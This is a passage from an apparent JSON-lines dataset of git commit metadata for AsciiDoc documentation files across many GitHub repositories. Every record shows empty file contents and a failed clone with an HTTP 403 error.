Guide\n","repos":"CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4","old_file":"docs\/UserGuide.adoc","new_file":"docs\/UserGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02d9578406c955d70a59c6676c044dac42e0d9bd","subject":"release notes: some edits","message":"release notes: some edits\n\n- Some small wording improvements\n- Moved 3-4-3 replication to new features since it seems large enough to\n not just be an \"improvement\"\n- Added a note that the 3-disks-per-replica change only affects new\n replicas\n- Stopped documenting the experimental flag which goes back to 3-2-3\n replication since we'd like to remove it in the future, and we don't\n know of any compelling reasons for someone to change it.\n- Moved KUDU-2259 to \"fixed issues\" since it was seen as a bug\n- Added a few explanations of the results of some fixes instead of the\n implementations.\n\nChange-Id: I944a302a7fe5c86d0204545157efb92407573e1e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9703\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"612ba5e8b5c9a0bc2b899d16b89f388ee309a007","subject":"Update 2017-11-06-api-blueprint.adoc","message":"Update 2017-11-06-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-api-blueprint.adoc","new_file":"_posts\/2017-11-06-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"970255ee756d6f015b65329aed3ec418526e5d94","subject":"Update 2019-11-17-poetry-as-art.adoc","message":"Update 
2019-11-17-poetry-as-art.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-17-poetry-as-art.adoc","new_file":"_posts\/2019-11-17-poetry-as-art.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39f43d000ee441df5090d85f33b8ed0b53e95f15","subject":"Update 2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","message":"Update 2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","new_file":"_posts\/2017-01-28-Why-I-want-to-become-a-Machine-Learning-Engineer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbc5efdf7a1365297d9321ac17c49489e0a4cced","subject":"Initial commit","message":"Initial commit\n","repos":"asciidoctor\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,asciidoctor\/asciidoctor-doctest","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahmanusta\/asciidoctor-doctest.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bb4f011dc159aeb48c4e8253de2db4b703cade1","subject":"Update 2016-08-13-2016-08-12.adoc","message":"Update 2016-08-13-2016-08-12.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-13-2016-08-12.adoc","new_file":"_posts\/2016-08-13-2016-08-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94f3d5bf887239b8f3f58b5e356b2ac3bd90716","subject":"Update 2017-04-05-nuovo-test.adoc","message":"Update 2017-04-05-nuovo-test.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-05-nuovo-test.adoc","new_file":"_posts\/2017-04-05-nuovo-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81fd99d67a2757f469e98a634aa9cad1f180def1","subject":"First draft of Omni UTXO management proposal","message":"First draft of Omni UTXO management proposal\n","repos":"OmniLayer\/OmniJ,OmniLayer\/OmniJ,OmniLayer\/OmniJ","old_file":"doc\/omni-utxo-management.adoc","new_file":"doc\/omni-utxo-management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OmniLayer\/OmniJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b78036fb28adf0e7ecf13a5c8f433902b029dfaa","subject":"y2b create post LG Google 
Nexus 4 Unboxing","message":"y2b create post LG Google Nexus 4 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-18-LG-Google-Nexus-4-Unboxing.adoc","new_file":"_posts\/2012-11-18-LG-Google-Nexus-4-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c2354c03b7cc80069d7fad6bfd2eab6c248e1a3","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0006ce60cf1c3412ac0964908cc21c1e17238e6","subject":"Page completed","message":"Page completed\n","repos":"taoguan\/incubator-groovy,genqiang\/incubator-groovy,taoguan\/incubator-groovy,avafanasiev\/groovy,aim-for-better\/incubator-groovy,alien11689\/groovy-core,traneHead\/groovy-core,rabbitcount\/incubator-groovy,EPadronU\/incubator-groovy,paulk-asert\/groovy,shils\/groovy,bsideup\/incubator-groovy,nobeans\/incubator-groovy,samanalysis\/incubator-groovy,adjohnson916\/incubator-groovy,sagarsane\/groovy-core,alien11689\/groovy-core,apache\/incubator-groovy,bsideup\/incubator-groovy,nobeans\/incubator-groovy,PascalSchumacher\/incubator-groovy,upadhyayap\/incubator-groovy,rabbitcount\/incubator-groovy,nkhuyu\/incubator-groovy,russel\/incubator-groovy,taoguan\/incubator-groovy,christoph-frick\/groovy-core,antoaravinth\/incubator-groovy,rlovtangen\/groovy-core,rlovtangen\/groovy-core,alien11689\/incubator-groovy,eginez\/incubator-groovy,gillius\/incubator-groovy,rlovtangen\/groovy-core,jwagenleitner\/groovy,bsideup\/incubator-groovy,groovy\/groovy-core,ChanJLee\/incubator-groovy,EPadronU\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/groovy,paplorinc\/incubator-groovy,adjohnson916\/incubator-groovy,kenzanmedia\/incubator-groovy,alien11689\/groovy-core,nkhuyu\/incubator-groovy,groovy\/groovy-core,paulk-asert\/incubator-groovy,avafanasiev\/groovy,armsargis\/groovy,paulk-asert\/groovy,pledbrook\/incubator-groovy,genqiang\/incubator-groovy,upadhyayap\/incubator-groovy,gillius\/incubator-groovy,jwagenleitner\/incubator-groovy,pickypg\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/incubator-groovy,ebourg\/groovy-core,gillius\/incubator-groovy,sagarsane\/incubator-groovy,kenzanmedia\/incubator-groovy,yukangguo\/incubator-groovy,paulk-asert\/incubator-groovy,aim-for-better\/incubator-groovy,taoguan\/incubator-groovy,mariogarcia\/groovy-core,aaronzirbes\/incubator-groovy,nkhuyu\/incubator-groovy,pledbrook\/incubator-groovy,i55ac\/incubator-groovy,aaronzirbes\/incubator-groovy,eginez\/incubator-groovy,paulk-asert\/incubator-groovy,sagarsane\/groovy-core,kenzanmedia\/incubator-groovy,bsideup\/groovy-core,nobeans\/incubator-groovy,kidaa\/incubator-groovy,avafanasiev\/groovy,traneHead\/groovy-
core,alien11689\/groovy-core,yukangguo\/incubator-groovy,shils\/incubator-groovy,paplorinc\/incubator-groovy,christoph-frick\/groovy-core,apache\/groovy,tkruse\/incubator-groovy,armsargis\/groovy,guangying945\/incubator-groovy,tkruse\/incubator-groovy,pickypg\/incubator-groovy,upadhyayap\/incubator-groovy,aaronzirbes\/incubator-groovy,jwagenleitner\/incubator-groovy,bsideup\/incubator-groovy,bsideup\/groovy-core,russel\/incubator-groovy,russel\/groovy,shils\/incubator-groovy,shils\/groovy,antoaravinth\/incubator-groovy,christoph-frick\/groovy-core,fpavageau\/groovy,sagarsane\/groovy-core,samanalysis\/incubator-groovy,jwagenleitner\/incubator-groovy,alien11689\/incubator-groovy,alien11689\/groovy-core,adjohnson916\/groovy-core,rabbitcount\/incubator-groovy,nkhuyu\/incubator-groovy,bsideup\/groovy-core,ebourg\/incubator-groovy,antoaravinth\/incubator-groovy,russel\/groovy,eginez\/incubator-groovy,yukangguo\/incubator-groovy,aim-for-better\/incubator-groovy,apache\/groovy,antoaravinth\/incubator-groovy,nobeans\/incubator-groovy,genqiang\/incubator-groovy,guangying945\/incubator-groovy,ebourg\/groovy-core,adjohnson916\/groovy-core,mariogarcia\/groovy-core,aim-for-better\/incubator-groovy,dpolivaev\/groovy,graemerocher\/incubator-groovy,paulk-asert\/incubator-groovy,kidaa\/incubator-groovy,apache\/incubator-groovy,gillius\/incubator-groovy,i55ac\/incubator-groovy,rlovtangen\/groovy-core,pledbrook\/incubator-groovy,fpavageau\/groovy,groovy\/groovy-core,paplorinc\/incubator-groovy,dpolivaev\/groovy,ebourg\/incubator-groovy,groovy\/groovy-core,yukangguo\/incubator-groovy,groovy\/groovy-core,adjohnson916\/groovy-core,adjohnson916\/groovy-core,graemerocher\/incubator-groovy,pledbrook\/incubator-groovy,tkruse\/incubator-groovy,sagarsane\/incubator-groovy,tkruse\/incubator-groovy,russel\/incubator-groovy,pickypg\/incubator-groovy,apache\/groovy,paulk-asert\/groovy,armsargis\/groovy,traneHead\/groovy-core,russel\/groovy,christoph-frick\/groovy-core,adjohnson916\/groovy-core,traneHead\/groovy-core,kenzanmedia\/incubator-groovy,graemerocher\/incubator-groovy,apache\/incubator-groovy,adjohnson916\/incubator-groovy,PascalSchumacher\/incubator-groovy,PascalSchumacher\/incubator-groovy,alien11689\/incubator-groovy,ChanJLee\/incubator-groovy,sagarsane\/groovy-core,shils\/groovy,fpavageau\/groovy,avafanasiev\/groovy,sagarsane\/incubator-groovy,EPadronU\/incubator-groovy,ChanJLee\/incubator-groovy,dpolivaev\/groovy,pickypg\/incubator-groovy,bsideup\/groovy-core,mariogarcia\/groovy-core,sagarsane\/groovy-core,sagarsane\/incubator-groovy,samanalysis\/incubator-groovy,adjohnson916\/incubator-groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,samanalysis\/incubator-groovy,genqiang\/incubator-groovy,ebourg\/incubator-groovy,fpavageau\/groovy,aaronzirbes\/incubator-groovy,paplorinc\/incubator-groovy,mariogarcia\/groovy-core,jwagenleitner\/groovy,jwagenleitner\/groovy,russel\/incubator-groovy,rabbitcount\/incubator-groovy,guangying945\/incubator-groovy,upadhyayap\/incubator-groovy,apache\/groovy,eginez\/incubator-groovy,ebourg\/groovy-core,PascalSchumacher\/incubator-groovy,shils\/groovy,PascalSchumacher\/incubator-groovy,shils\/incubator-groovy,alien11689\/incubator-groovy,kidaa\/incubator-groovy,shils\/incubator-groovy,jwagenleitner\/groovy,dpolivaev\/groovy,russel\/groovy,apache\/incubator-groovy,mariogarcia\/groovy-core,EPadronU\/incubator-groovy,ebourg\/groovy-core,graemerocher\/incubator-groovy,rlovtangen\/groovy-core,ebourg\/incubator-groovy,ebourg\/groovy-core,christoph-frick\/groovy-core,ChanJLee\/incuba
tor-groovy,guangying945\/incubator-groovy,kidaa\/incubator-groovy","old_file":"src\/spec\/doc\/version-scheme.adoc","new_file":"src\/spec\/doc\/version-scheme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kidaa\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7660b1c287faa334662caeefc68e5f50c24b1b3d","subject":"y2b create post The Wood Log Of Mystery...","message":"y2b create post The Wood Log Of Mystery...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-11-The-Wood-Log-Of-Mystery.adoc","new_file":"_posts\/2016-02-11-The-Wood-Log-Of-Mystery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bab2a2ac57fa29de891b06338705d4b3903d02cc","subject":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","message":"Update 2017-10-05-making-L-A-M-P-by-A-W-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_file":"_posts\/2017-10-05-making-L-A-M-P-by-A-W-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d0f1af63e14e520cb08e00e78ffb8f2e7999984","subject":"Update 2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-03-23-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60fe80f42f9cf5ca25756712cce977bebe157d96","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e2298c259c1c2b89bf95ae4be2f42d6f79e0aa7","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-bus,spring-cloud\/spring-cloud-bus","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-bus.git\/': The 
requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c8f5971ebefd4597b302aec3e4e1569299b2177","subject":"Added (empty) examples ascii doc file.","message":"Added (empty) examples ascii doc file.\n","repos":"syzer\/incubator-tamaya,salyh\/incubator-tamaya,marschall\/incubator-tamaya,syzer\/incubator-tamaya,marschall\/incubator-tamaya,apache\/incubator-tamaya,salyh\/incubator-tamaya,salyh\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya,syzer\/incubator-tamaya,marschall\/incubator-tamaya","old_file":"docs\/src\/main\/asciidoc\/examples.adoc","new_file":"docs\/src\/main\/asciidoc\/examples.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marschall\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0641c8328615eb6732efd0fba64ee39801d3a77","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06997c78a67d4be837da0d544e909611bde899f3","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6cc0109dbc74f1582661f346b67c0f8113ef549","subject":"Update 2019-01-31-Blog-Servers.adoc","message":"Update 2019-01-31-Blog-Servers.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"318ac257c3c87ec6a8cc9b09777c9377dcd6a622","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb1a21a78ea36f158d6afb215fe980e109c3c29","subject":"Update 2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","message":"Update 
2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","new_file":"_posts\/2017-10-03-Episode-113-Save-The-Pinball-For-Last.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f2d86ee3cdc283133df3c964e49ff1c25652d2a","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"970c48550b08d75d46d2425873c0175fd6aba71f","subject":"Create newcpp.adoc","message":"Create newcpp.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/newcpp.adoc","new_file":"_posts\/newcpp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e571dc7ba52473cc3e3c766d0db5c084fea74204","subject":"More work on the user guide","message":"More work on the user guide\n\ngit-svn-id: 10bc45916fe30ae642aa5037c9a4b05727bba413@1844782 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/wss4j,apache\/wss4j","old_file":"src\/site\/asciidoc\/config.adoc","new_file":"src\/site\/asciidoc\/config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wss4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3cbc2ba23ac1acb0b48cb080f1a690905c6bbb3b","subject":"Fix broken hyperlink","message":"Fix broken hyperlink\n\nThere is a line break between the URI and the caption of the link. This breaks the link in Asciidoctor and in the Github preview. 
This commit rearranges the line breaks so that this issue is resolved.","repos":"raphw\/spock,raphw\/spock,spockframework\/spock,siordache\/spock,siordache\/spock,siordache\/spock,raphw\/spock,leonard84\/spock","old_file":"docs\/getting_started.adoc","new_file":"docs\/getting_started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonard84\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72cb6729edc2c8f602723ff10866c91a06521517","subject":"Initial commit","message":"Initial commit\n","repos":"kcrimson\/asciidoctor-reveal.js,kcrimson\/asciidoctor-reveal.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kcrimson\/asciidoctor-reveal.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaf521ce4baaf96161b06296539657e08accc05a","subject":"Moving CNV document attributes file into 4.1","message":"Moving CNV document attributes file into 4.1\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cnv-document-attributes.adoc","new_file":"modules\/cnv-document-attributes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4ab856bbec950a9b0451e67c9f735506a64c9a1","subject":"Update 2015-07-29-Test-posting.adoc","message":"Update 2015-07-29-Test-posting.adoc","repos":"gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress","old_file":"_posts\/2015-07-29-Test-posting.adoc","new_file":"_posts\/2015-07-29-Test-posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gendalf9\/gendalf9.github.io---hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d82e16a4fa9abd070cb85e209bd3740b2c4721","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e785543d1cda20093ebb5799e6c26f97ab8e98e","subject":"Update 2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","message":"Update 2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","new_file":"_posts\/2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab5ac93093db9192e7e2e9b67932dc6d34ec351d","subject":"restructure overview for better flow","message":"restructure overview for better flow\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b8acfa86e2db97eee55098b07c0ef7dc112dc83","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 